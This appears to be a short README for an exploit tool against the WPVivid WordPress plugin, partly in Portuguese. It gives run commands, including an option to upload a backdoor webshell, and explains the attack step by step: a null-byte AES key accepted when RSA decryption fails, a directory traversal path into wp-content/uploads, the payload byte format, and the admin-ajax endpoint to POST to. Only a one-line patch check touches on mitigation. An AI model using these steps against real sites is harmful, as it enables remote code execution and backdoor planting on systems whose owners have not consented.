
Exploit for CVE-2026-1357 in WordPress WPVivid plugin, enabling remote code execution via crafted AES-encrypted payloads and directory traversal to upload a webshell.
pip3 install pycryptodome requests
python3 wpvivi.py http://target.com
python3 wpvivi.py http://target.com --shell backdoor.php
python3 wpvivi.py http://target.com --code "" Explicação técnica: Null Byte Key: Quando RSA decrypt falha, retorna false, que phpseclib trata como "\x00\x00\x00". Usamos 16 null bytes como chave AES-128 ECB. Directory Traversal: Filename não é sanitizado, permitindo ../../../../wp-content/uploads/shell.php Payload Format:
[len_key_hex(2 bytes)] + [key_hex] + [len_data_hex(16 bytes)] + [encrypted_data] Execução: POST para /wp-admin/admin-ajax.php?action=wpvivid_action&wpvivid_action=send_to_site wpvivid_content = base64(payload criptografado) Detecção e Mitigação:
Patched em 0.9.124:
if ($key === false || empty($key)) return false;